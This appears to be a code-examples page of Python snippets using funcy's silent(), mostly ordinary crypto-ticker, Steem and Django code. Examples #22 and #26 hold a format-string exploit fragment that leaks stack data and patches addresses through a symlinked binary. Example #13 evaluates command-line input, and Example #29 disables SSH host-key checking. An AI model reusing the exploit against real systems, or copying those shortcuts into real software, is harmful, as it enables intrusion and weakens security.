Example #1
0
def test_3():
    path = 'urls_.yml'
    silent(os.remove)(path)
    with track_function(
            'yaml.load',
            path,
    ):
        yaml.load('a/5/b')
        yaml.load('a/9/b')
        yaml.load('a/3/b')
    assert os.path.exists(path)
    with open(path) as f:
        print()
        print(f.read())
    silent(os.remove)(path)
Example #2
0
def parse_tickets(text):
    result = {'tickets': {}, 'warnings': []}

    # Parse total number of tickets
    total_s, ticket_s = re.split(r'30\s*000', text, 2)
    result['total'] = silent(int)(re.sub(r'\D', '',
                                         re_find(r'[\d\s]+\D*$', total_s)))

    # Parse (nick, ticket count) pairs
    known_names = read_names()
    ticket_pairs = re.findall(r'(\w[\w\d \|]*)\W+((?:\w )?[\doOоО]+\b)?',
                              ticket_s)
    tickets = {}
    for name, count in ticket_pairs:
        # Check if name is known or similar enough to known one
        name, warning = parse_name(name)
        if warning:
            result['warnings'].append(warning)
        if name is None:
            continue

        # Parse number part
        count = parse_number(count)
        if count is None:
            result['warnings'].append('No count for %s' % name)

        if count is not None:
            result['tickets'][name] = count

    return result
Example #3
0
    def sbd_btc_ticker(verbose=False):
        prices = {}
        urls = [
            "https://poloniex.com/public?command=returnTicker",
            "https://bittrex.com/api/v1.1/public/getmarketsummary?market=BTC-SBD",
        ]
        responses = list(silent(requests.get)(u, timeout=30) for u in urls)

        for r in [x for x in responses
                  if hasattr(x, "status_code") and x.status_code == 200 and x.json()]:
            if "poloniex" in r.url:
                with suppress(KeyError):
                    data = r.json()["BTC_SBD"]
                    if verbose:
                        print("Spread on Poloniex is %.2f%%" %
                              Tickers.calc_spread(data['highestBid'], data['lowestAsk']))
                    prices['poloniex'] = {
                        'price': float(data['last']),
                        'volume': float(data['baseVolume'])}
            elif "bittrex" in r.url:
                with suppress(KeyError):
                    data = r.json()["result"][0]
                    if verbose:
                        print("Spread on Bittrex is %.2f%%" %
                              Tickers.calc_spread(data['Bid'], data['Ask']))
                    price = (data['Bid'] + data['Ask']) / 2
                    prices['bittrex'] = {'price': price, 'volume': data['BaseVolume']}

        if len(prices) == 0:
            raise RuntimeError("Obtaining SBD/BTC prices has failed from all sources.")

        return Tickers._wva(
            [x['price'] for x in prices.values()],
            [x['volume'] for x in prices.values()])
Example #4
0
def update():
    """Update witness properties."""
    c = get_config()
    c['witness']['url'] = click.prompt(
        'What should be your witness URL?',
        default=c['witness']['url'],
    )
    creation_fee = click.prompt(
        'How much do you want the account creation fee to be (STEEM)?',
        default=c['props']['account_creation_fee'],
    )
    if silent(float)(creation_fee):
        creation_fee = "%s STEEM" % float(creation_fee)
    c['props']['account_creation_fee'] = str(Amount(creation_fee))

    c['props']['maximum_block_size'] = click.prompt(
        'What should be the maximum block size?',
        default=c['props']['maximum_block_size'],
    )
    c['props']['sbd_interest_rate'] = click.prompt(
        'What should be the SBD interest rate?',
        default=c['props']['sbd_interest_rate'],
    )

    # verify
    output(c, '\nConfiguration')
    click.confirm('Do you want to commit the updated values?', abort=True)

    # update
    set_config(c)
    witness_set_props(c['witness']['url'], c['props'])
    output('Witness %s Updated' % c['witness']['name'])
Example #5
0
    def take(self, limit=5):
        """ Take up to n (n = limit) posts/comments at a time.

        You can call this method as many times as you want. Once
        there are no more posts to take, it will return [].

        Returns:
            List of posts/comments in a batch of size up to `limit`.
        """
        # get main posts only
        comment_filter = is_comment if self.comments_only else complement(
            is_comment)
        hist = filter(comment_filter, self.history)

        # filter out reblogs
        hist2 = filter(lambda x: x["author"] == self.account.name, hist)

        # post edits will re-appear in history
        # we should therefore filter out already seen posts
        def ensure_unique(post):
            if post["permlink"] not in self.seen_items:
                self.seen_items.add(post["permlink"])
                return True

        unique = filter(ensure_unique, hist2)

        serialized = filter(bool, map(silent(Post), unique))

        batch = take(limit, serialized)
        return batch
Example #6
0
    def steem_btc_ticker():
        prices = {}
        urls = [
            "https://poloniex.com/public?command=returnTicker",
            "https://bittrex.com/api/v1.1/public/getmarketsummary?market=BTC-STEEM",
            "https://api.binance.com/api/v1/ticker/24hr",
        ]
        responses = list(silent(requests.get)(u, timeout=30) for u in urls)

        for r in [x for x in responses
                  if hasattr(x, "status_code") and x.status_code == 200 and x.json()]:
            if "poloniex" in r.url:
                with suppress(KeyError):
                    data = r.json()["BTC_STEEM"]
                    prices['poloniex'] = {
                        'price': float(data['last']),
                        'volume': float(data['baseVolume'])}
            elif "bittrex" in r.url:
                with suppress(KeyError):
                    data = r.json()["result"][0]
                    price = (data['Bid'] + data['Ask']) / 2
                    prices['bittrex'] = {'price': price, 'volume': data['BaseVolume']}
            elif "binance" in r.url:
                with suppress(KeyError):
                    data = [x for x in r.json() if x['symbol'] == 'STEEMBTC'][0]
                    prices['binance'] = {
                        'price': float(data['lastPrice']),
                        'volume': float(data['quoteVolume'])}

        if len(prices) == 0:
            raise RuntimeError("Obtaining STEEM/BTC prices has failed from all sources.")

        return Tickers._wva(
            [x['price'] for x in prices.values()],
            [x['volume'] for x in prices.values()])
Example #7
0
    def calc_clicked(self):

        time.sleep(1)

        self.browser_visit('dashboard')

        #logging.warn("finding element by xpath")
        elem = self.browser.find_by_xpath(
            '/html/body/table[2]/tbody/tr/td[2]/table/tbody/tr/td[2]/table[2]/tbody/tr/td'
        )

        # The click status box says: <div align="center"><strong><font color="#FFFFFF">Surf Clicked Today: 0<br>You have clicked on 10 ads within the last 24 hours<br>
        # The click status box says: <div align="center"><strong><font color="#FFFFFF">Surf Clicked Today: 6<br>You have NOT clicked on 10 ads within the last 24 hours<br>

        html = get_element_html(self.browser.driver, elem[0]._element)
        find = html.find("You have NOT clicked on")

        print("HTML={0}. Find={1}.".format(html, find))

        if html.find("You have NOT clicked on") != -1:
            return -1
        else:
            clicked = funcy.silent(int)(
                funcy.re_find(r'You have clicked on (\d+)', html))
            return clicked

        raise("Could not calculate clicked.")
Example #8
0
class Story(Model, Node):
    _schema = story_schema

    def _on_init(self):
        try:
            self._validate()
        except Exception as e:
            print('ERROR in validation for Story:')
            print()
            print(str(e))
            print()
            print(self._yaml())
            print()

    mpd = property(lambda self: get_manifest(self))

    image = property(lambda self: get_image_url(self))

    video = property(lambda self: get_video_url(self))

    __repr__ = lambda self: f'Story(pk={self.pk})'

    location = property(lambda self: fallback(
        lambda: self['story_locations'][0]['location'], lambda: self[
            'story_locations']['location'], lambda: None))

    geotag: compose(
        property, silent)(lambda self: self['story_locations'][0]['location'])

    swipeup_url = property(
        silent(lambda self: self['story_cta'][0]['links'][0]['webUri']))

    spotyfy_song = property(
        lambda self: self['story_app_attribution']['content_url'])
Example #9
0
    def refresh(self):
        post_author, post_permlink = resolve_identifier(self.identifier)
        post = self.steemd.get_content(post_author, post_permlink)
        if not post["permlink"]:
            raise PostDoesNotExist("Post does not exist: %s" % self.identifier)

        # If this 'post' comes from an operation, it might carry a patch
        if "body" in post and re.match("^@@", post["body"]):
            self.patched = True

        # TODO: Check
        # This field is returned from blockchain, but it's empty. Fill it
        post['reblogged_by'] = [i for i in self.steemd.get_reblogged_by(post_author, post_permlink) if i != post_author]

        # Parse Times
        parse_times = ["active",
                       "cashout_time",
                       "created",
                       "last_payout",
                       "last_update",
                       "max_cashout_time"]
        for p in parse_times:
            post[p] = parse_time(post.get(p, "1970-01-01T00:00:00"))

        # Parse Amounts
        sbd_amounts = [
            'total_payout_value',
            'max_accepted_payout',
            'pending_payout_value',
            'curator_payout_value',
            'total_pending_payout_value',
            'promoted',
        ]
        for p in sbd_amounts:
            post[p] = Amount(post.get(p, "0.000 GBG"))

        # calculate trending and hot scores for sorting
        post['score_trending'] = calculate_trending(post.get('net_rshares', 0), post['created'])
        post['score_hot'] = calculate_hot(post.get('net_rshares', 0), post['created'])

        # turn json_metadata into python dict
        meta_str = post.get("json_metadata", "{}")
        post['json_metadata'] = silent(json.loads)(meta_str) or {}

        post["tags"] = []
        post['community'] = ''
        if isinstance(post['json_metadata'], dict):
            if post["depth"] == 0:
                tags = [post["parent_permlink"]]
                tags += get_in(post, ['json_metadata', 'tags'], default=[])
                tags_set = set(tags)
                post["tags"] = [tag for tag in tags if tag not in tags_set]

            post['community'] = get_in(post, ['json_metadata', 'community'], default='')

        # If this post is a comment, retrieve the root comment
        self.root_identifier, self.category = self._get_root_identifier(post)

        self._store_post(post)
Example #10
0
def test_track_class():
    path = 'urls_.yml'
    silent(os.remove)(path)
    with track_method(
            'xxx.Klass',
            'ciao',
            path,
    ):
        x = Klass()
        x.ciao('a/1/b')
        x.ciao('a/2/b')
        x.ciao('a/8/b')
    assert os.path.exists(path)
    with open(path) as f:
        print()
        print(f.read())
    silent(os.remove)(path)
Example #11
0
def register_apps(app):
  for pkg in w_utils.find_modules('apps', True):
    pkg_views = '%s.views' % pkg
    objs = [get_module_obj(pkg_views, obj) for obj in ['bpa', 'bp']]
    funcy.walk(funcy.silent(app.register_blueprint), objs)
    app_init = get_module_obj(pkg, 'app_init')
    if app_init:
      app_init(app)
Example #12
0
def log(request, analysis_id):
    analysis = get_object_or_404(Analysis, pk=analysis_id)
    offset = silent(int)(request.GET.get('offset')) or 0

    log_lines = redis_client.lrange('analysis:%s:log' % analysis_id, offset,
                                    -1)
    if request.is_ajax():
        return JsonResponse(log_lines, safe=False)
    else:
        return {'analysis': analysis, 'log_lines': log_lines}
Example #13
0
def parse_option(string):
    if '=' not in string:
        string += '='
    name, value = re.split('=', string)
    if value == '':
        value = False if name.startswith('-no-') else True
    else:
        value = fn.silent(eval)(value) or value
    name = re.sub('-', '_', re.sub('^(-no-|-)', '', name))
    return variables.option._replace(name=name, value=value)
Example #14
0
    def btc_usd_ticker(verbose=False):
        prices = {}
        urls = [
            "https://api.bitfinex.com/v1/pubticker/BTCUSD",
            "https://api.gdax.com/products/BTC-USD/ticker",
            "https://api.kraken.com/0/public/Ticker?pair=XBTUSD",
            "https://www.okcoin.com/api/v1/ticker.do?symbol=btc_usd",
            "https://www.bitstamp.net/api/v2/ticker/btcusd/",
        ]
        responses = list(silent(requests.get)(u, timeout=30) for u in urls)

        for r in [x for x in responses
                  if hasattr(x, "status_code") and x.status_code == 200 and x.json()]:
            if "bitfinex" in r.url:
                with suppress(KeyError):
                    data = r.json()
                    prices['bitfinex'] = {
                        'price': float(data['last_price']),
                        'volume': float(data['volume'])}
            elif "gdax" in r.url:
                with suppress(KeyError):
                    data = r.json()
                    prices['gdax'] = {
                        'price': float(data['price']),
                        'volume': float(data['volume'])}
            elif "kraken" in r.url:
                with suppress(KeyError):
                    data = r.json()['result']['XXBTZUSD']['p']
                    prices['kraken'] = {
                        'price': float(data[0]),
                        'volume': float(data[1])}
            elif "okcoin" in r.url:
                with suppress(KeyError):
                    data = r.json()["ticker"]
                    prices['okcoin'] = {
                        'price': float(data['last']),
                        'volume': float(data['vol'])}
            elif "bitstamp" in r.url:
                with suppress(KeyError):
                    data = r.json()
                    prices['bitstamp'] = {
                        'price': float(data['last']),
                        'volume': float(data['volume'])}

        if verbose:
            pprint(prices)

        if len(prices) == 0:
            raise RuntimeError("Obtaining BTC/USD prices has failed from all sources.")

        # vwap
        return Tickers._wva(
            [x['price'] for x in prices.values()],
            [x['volume'] for x in prices.values()])
Example #15
0
def time_command(cmd):
    cprint('Timing "%s": ' % cmd, "green")

    # We will collect unbuffered output with timestamps to measure hang ups.
    # Python buffers output when it's redirected, so this is critical.
    output = []
    env = {**os.environ, "PYTHONUNBUFFERED": "x", "COLUMNS": str(get_cols())}
    start = time.monotonic()

    # Execute command with output redirected to pipe and unbuffered
    proc = subprocess.Popen(
        cmd,
        bufsize=0,
        shell=True,
        env=env,
        cwd=_cwd,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
    )

    # Collect the combined output as it goes
    while True:
        chunk = proc.stdout.read(1024)
        if not chunk:
            break

        output.append((time.monotonic(), chunk))

        sys.stdout.buffer.write(chunk)
        sys.stdout.flush()

    proc.wait()
    end = time.monotonic()

    # Fail loudly and stop the benchmark
    if proc.returncode != 0:
        raise Exception('Command "{}" failed with code {}'.format(
            cmd, proc.returncode))

    total = end - start
    cprint("%s s" % total, "green")

    # from pprint import pprint
    # pprint(output)

    return {
        "total": total,
        "in": output[0][0] - start if output else None,
        "out": end - output[-1][0] if output else None,
        "sleep": silent(max)(r[0] - l[0] for l, r in pairwise(output)),
        "output": output,
    }
def get_series_tag_history():
    series_tag_history = {
        'created': defaultdict(int),
        'validated': defaultdict(int),
        'invalidated': defaultdict(int)
    }
    qs = SeriesTag.objects.filter(
        is_active=True).prefetch_related('validations')

    for tag in tqdm(qs, total=qs.count(), desc='series tag history'):
        validations = list(tag.validations.all())
        series_tag_history['created'][ceil_date(tag.created_on)] += 1
        validated = silent(min)(v.created_on for v in validations
                                if v.annotation_kappa == 1)
        if validated:
            series_tag_history['validated'][ceil_date(validated)] += 1
            invalidated = silent(min)(v.created_on for v in validations
                                      if v.agrees_with is not None)
            if invalidated:
                series_tag_history['invalidated'][ceil_date(invalidated)] += 1

    return walk_values(accumulate, series_tag_history)
Example #17
0
def parse_number(s):
    # Replace all sorts of Os, english and russian
    s = re.sub(r'[oOоО]', '0', s)
    numbers = re.findall(r'\d+', s)

    # Filter out single digits as noise
    if len(numbers) > 1:
        numbers = [s for s in numbers if len(s) > 1]

    if len(numbers) != 1:
        return None

    return silent(int)(numbers[0])
Example #18
0
def check_from_class(check_class: type, obj, *checker_args, **checker_kwargs):
    failures = []
    advice = []
    for Checker in get_subclasses(check_class):
        checker = Checker(*checker_args, **checker_kwargs)
        check = checker.do_check
        success = check(obj)
        if not success:
            failures.append(Checker.__name__)
            advice_item = silent(checker.give_advice)(obj)
            advice.append(advice_item)

    valid = not failures
    return valid, failures, advice
Example #19
0
def init():
    """Add your witness account."""
    account = click.prompt('What is your witness account name?', type=str)
    witness = get_witness(account)
    if witness:
        c = new_config()
        c['witness']['name'] = account
        c['witness']['url'] = witness['url']
        c['props'] = witness['props']
        set_config(c)
        echo('Imported a witness %s from its existing settings.' % account)

    else:
        click.confirm('Witness %s does not exist. Would you like to create it?' % account, abort=True)

        c = new_config()
        c['witness']['name'] = account
        c['witness']['url'] = click.prompt(
            'What should be your witness URL?',
            default=c['witness']['url'],
        )
        creation_fee = click.prompt(
            'How much do you want the account creation fee to be (STEEM)?',
            default=c['props']['account_creation_fee'],
        )
        if silent(float)(creation_fee):
            creation_fee = "%s STEEM" % float(creation_fee)
        c['props']['account_creation_fee'] = str(Amount(creation_fee))

        c['props']['maximum_block_size'] = click.prompt(
            'What should be the maximum block size?',
            default=c['props']['maximum_block_size'],
        )
        c['props']['sbd_interest_rate'] = click.prompt(
            'What should be the SBD interest rate?',
            default=c['props']['sbd_interest_rate'],
        )
        c['props']['account_subsidy_budget'] = click.prompt(
            'What should be the account subsidy budget?',
            default=c['props']['account_subsidy_budget'],
        )
        c['props']['account_subsidy_decay'] = click.prompt(
            'What should be the account subsidy decay?',
            default=c['props']['account_subsidy_decay'],
        )
        set_config(c)
        witness_create(c)
        echo('Witness %s created!' % account)
Example #20
0
 def duration(text):
     regexes = [
         r'()(?:(\d\d):)?(\d\d):(\d\d)(?:\s|$)',
         re.compile(
             r'''\s* (?:(\d+)\s*д[еньяй.]*)?
                        \s* (?:(\d+)\s*ч[ас.]*)?
                        \s* (?:(\d+)\s*м[инуты.]*)?
                        ()''', re.I | re.X)
     ]
     for regex in regexes:
         m = re_find(regex, text)
         if m:
             days, hours, minutes, seconds = [
                 silent(int)(p) or 0 for p in m
             ]
             if days == hours == minutes == 0:
                 return None
             return (days * 24 + hours * 60 + minutes) * 60 + seconds
Example #21
0
def search(request):
    q = request.GET.get('q')
    if not q:
        return {'series': None}

    exclude_tags = keep(silent(int), request.GET.getlist('exclude_tags'))
    serie_tags, tag_series, tag_ids = series_tags_data()

    q_string, q_tags = _parse_query(q)
    q_tags, wrong_tags = split(lambda t: t.lower() in tag_ids, q_tags)
    if wrong_tags:
        message = 'Unknown tag%s %s.' % ('s' if len(wrong_tags) > 1 else '', ', '.join(wrong_tags))
        messages.warning(request, message)
    if not q_string and not q_tags:
        return {'series': None}

    qs = search_series_qs(q_string)
    if q_tags:
        q_tag_ids = keep(tag_ids.get(t.lower()) for t in q_tags)
        include_series = reduce(set.intersection, (tag_series[t] for t in q_tag_ids))
        if include_series:
            qs = qs.filter(id__in=include_series)
        else:
            message = 'No series annotated with %s.' \
                % (q_tags[0] if len(q_tags) == 1 else 'all these tags simultaneously')
            messages.warning(request, message)
            return {'series': []}
    if exclude_tags:
        exclude_series = join(tag_series[t] for t in exclude_tags)
        qs = qs.exclude(id__in=exclude_series)

    series_ids = qs.values_list('id', flat=True)
    tags = distinct(imapcat(serie_tags, series_ids), key=itemgetter('id'))
    # TODO: do not hide excluded tags

    return {
        'series': qs,
        'tags': tags,
        'serie_tags': serie_tags,
    }
Example #22
0
#
# To do this, we will create a symlink to the target binary
# with a large cyclic name, and search for the pattern on
# the stack.
#
symlink = cyclic(0x20)
offset = -1
shell.ln(['-s', binary, symlink])

# Params of (110,120) chosen after letting it run (0,500) once.
# This is just quicker since I'm running it multiple times to dev.
for index in range(110, 120):
    ch = shell.run('python noarg.py ./%s' % symlink)
    ch.sendline('%{}$X'.format(index))
    response = ch.recvline().strip()
    data = silent(unhex)(response)
    if data is None or len(data) != 4:
        continue

    offset = cyclic_find(data[::-1])
    if 0 <= offset and offset < 0x100:
        break

log.info("Found binary name on stack in argument %i at offset %i" %
         (index, offset))

#
# Step 1B
#
# Put the addresses that we want to patch in the name
# of the symlink, and reference them as arguments from
Example #23
0
def search(request):
    # Save last specie in session
    specie = request.GET.get('specie')
    if specie != request.session.get('specie'):
        request.session['specie'] = specie

    q = request.GET.get('q')
    if not q:
        return {'series': None}

    exclude_tags = lkeep(silent(int), request.GET.getlist('exclude_tags'))
    series_tags, tag_series, tag_ids = series_tags_data()

    # Parse query
    q_string, q_tags = _parse_query(q)
    q_tags, wrong_tags = lsplit(lambda t: t.lower() in tag_ids, q_tags)
    if wrong_tags:
        message = 'Unknown tag%s %s.' % ('s' if len(wrong_tags) > 1 else '',
                                         ', '.join(wrong_tags))
        messages.warning(request, message)
    if not q_string and not q_tags:
        return {'series': None}

    # Build qs
    qs = search_series_qs(q_string)
    if specie:
        qs = qs.filter(specie=specie)

    if q_tags:
        q_tag_ids = lkeep(tag_ids.get(t.lower()) for t in q_tags)
        include_series = reduce(set.intersection,
                                (tag_series[t] for t in q_tag_ids))
        if include_series:
            qs = qs.filter(id__in=include_series)
        else:
            message = 'No series annotated with %s.' \
                % (q_tags[0] if len(q_tags) == 1 else 'all these tags simultaneously')
            messages.warning(request, message)
            return {'series': []}

    series_ids = qs.values_list('id', flat=True).order_by()
    tags = ldistinct(mapcat(series_tags, series_ids), key=itemgetter('id'))

    if exclude_tags:
        exclude_series = join(tag_series[t] for t in exclude_tags)
        qs = qs.exclude(id__in=exclude_series)

    series = paginate(request, qs, 10)

    # Get annotations statuses
    annos_qs = SeriesAnnotation.objects.filter(series__in=series) \
                               .values_list('series_id', 'tag_id', 'best_cohens_kappa')
    tags_validated = {(s, t): k == 1 for s, t, k in annos_qs}

    return dict(
        {
            'series': series,
            'page': series,
            'tags_validated': tags_validated,
            'tags': tags,
            'series_tags': series_tags,
        }, **_search_stats(qs))
Example #24
0
 def get_replies(self):
     """ Return **first-level** comments of the post.
     """
     post_author, post_permlink = resolve_identifier(self.identifier)
     replies = self.steemd.get_content_replies(post_author, post_permlink)
     return map(silent(Post), replies)
Example #25
0
 def _try_get_ssh_config_port(user_ssh_config):
     return silent(int)(user_ssh_config.get("port"))
Example #26
0
# with a large cyclic name, and search for the pattern on
# the stack.
#
symlink = cyclic(0x20)
offset  = -1
shell.ln(['-s',binary, symlink])



# Params of (110,120) chosen after letting it run (0,500) once.
# This is just quicker since I'm running it multiple times to dev.
for index in range(110,120):
    ch = shell.run('python noarg.py ./%s' % symlink)
    ch.sendline('%{}$X'.format(index))
    response = ch.recvline().strip()
    data = silent(unhex)(response)
    if data is None or len(data) != 4:
        continue

    offset = cyclic_find(data[::-1])
    if 0 <= offset and offset < 0x100:
        break

log.info("Found binary name on stack in argument %i at offset %i" % (index, offset))

#
# Step 1B
#
# Put the addresses that we want to patch in the name
# of the symlink, and reference them as arguments from
# print.
Example #27
0
            'study_area_description/citable_classification_system',
            'study_area_description/name', 'design_description', 'id')
    data = _dumb_parse(e, keys)
    data['personnel'] = [_parse_agent(el) for el in e.findall('personnel')]

    return data


def _parse_additional(e):
    url = _text(e.find('resourceLogoUrl'))
    if url:
        url = urlparse(url)._replace(path='/archive.do').geturl()

    description = _text(e.find('citation'))
    return {'url': url, 'description': description, 'name': 'Source archive'}


def unlinkify_para(para):
    result = para.text
    for child in para.iterchildren():
        child_text = ''.join(list(child.itertext()))
        child_url = child.attrib.get('url')
        if child_url:
            child_text = '[{}]({})'.format(child_text, child_url)
        result += child_text + child.tail

    return result


_get_content = silent(attrgetter('content'))
Example #28
0
def scrape_comments(mongo, batch_size=250, max_workers=50):
    """ Parse operations and post-process for comment/post extraction. """
    indexer = Indexer(mongo)
    start_block = indexer.get_checkpoint('comments')

    query = {
        "type": "comment",
        "block_num": {
            "$gt": start_block,
            "$lte": start_block + batch_size,
        }
    }
    projection = {
        '_id': 0,
        'block_num': 1,
        'author': 1,
        'permlink': 1,
    }
    results = list(mongo.Operations.find(query, projection=projection))
    identifiers = set(f"{x['author']}/{x['permlink']}" for x in results)

    # handle an edge case when we are too close to the head,
    # and the batch contains no work to do
    if not results and is_recent(start_block, days=1):
        return

    # get Post.export() results in parallel
    raw_comments = thread_multi(fn=get_comment,
                                fn_args=[None],
                                dep_args=list(identifiers),
                                max_workers=max_workers,
                                yield_results=True)
    raw_comments = lkeep(raw_comments)

    # split into root posts and comments
    posts = lfilter(lambda x: x['depth'] == 0, raw_comments)
    comments = lfilter(lambda x: x['depth'] > 0, raw_comments)

    # Mongo upsert many
    log_output = ''
    if posts:
        r = mongo.Posts.bulk_write(
            [
                UpdateOne({'identifier': x['identifier']},
                          {'$set': {
                              **x, 'updatedAt': dt.datetime.utcnow()
                          }},
                          upsert=True) for x in posts
            ],
            ordered=False,
        )
        log_output += \
            f'(Posts: {r.upserted_count} upserted, {r.modified_count} modified) '
    if comments:
        r = mongo.Comments.bulk_write(
            [
                UpdateOne({'identifier': x['identifier']},
                          {'$set': {
                              **x, 'updatedAt': dt.datetime.utcnow()
                          }},
                          upsert=True) for x in comments
            ],
            ordered=False,
        )
        log_output += \
            f'(Comments: {r.upserted_count} upserted, {r.modified_count} modified) '

    # We are only querying {type: 'comment'} blocks and sometimes
    # the gaps are larger than the batch_size.
    index = silent(max)(lpluck('block_num',
                               results)) or (start_block + batch_size)
    indexer.set_checkpoint('comments', index)

    log.info(f'Checkpoint: {index} {log_output}')
Example #29
0
File: ssh.py Project: rpatil524/dvc
    def _prepare_credentials(self, **config):
        self.CAN_TRAVERSE = True
        from sshfs.config import parse_config

        login_info = {}

        try:
            user_ssh_config = parse_config(host=config["host"])
        except FileNotFoundError:
            user_ssh_config = {}

        login_info["host"] = user_ssh_config.get("Hostname", config["host"])

        login_info["username"] = (config.get("user") or config.get("username")
                                  or user_ssh_config.get("User")
                                  or getpass.getuser())

        login_info["port"] = (config.get("port")
                              or silent(int)(user_ssh_config.get("Port"))
                              or self.DEFAULT_PORT)

        if config.get("ask_password") and config.get("password") is None:
            config["password"] = ask_password(login_info["host"],
                                              login_info["username"],
                                              login_info["port"])

        login_info["password"] = config.get("password")
        login_info["passphrase"] = config.get("password")

        raw_keys = []
        if config.get("keyfile"):
            raw_keys.append(config.get("keyfile"))
        elif user_ssh_config.get("IdentityFile"):
            raw_keys.extend(user_ssh_config.get("IdentityFile"))

        if raw_keys:
            login_info["client_keys"] = [
                os.path.expanduser(key) for key in raw_keys
            ]

        login_info["timeout"] = config.get("timeout", _SSH_TIMEOUT)

        # These two settings fine tune the asyncssh to use the
        # fastest encryption algorithm and disable compression
        # altogether (since it blocking, it is slowing down
        # the transfers in a considerable rate, and even for
        # compressible data it is making it extremely slow).
        # See: https://github.com/ronf/asyncssh/issues/374
        login_info["encryption_algs"] = [
            "*****@*****.**",
            "aes256-ctr",
            "aes192-ctr",
            "aes128-ctr",
        ]
        login_info["compression_algs"] = None

        login_info["gss_auth"] = config.get("gss_auth", False)
        login_info["agent_forwarding"] = config.get("agent_forwarding", True)
        login_info["proxy_command"] = user_ssh_config.get("ProxyCommand")

        # We are going to automatically add stuff to known_hosts
        # something like paramiko's AutoAddPolicy()
        login_info["known_hosts"] = None
        return login_info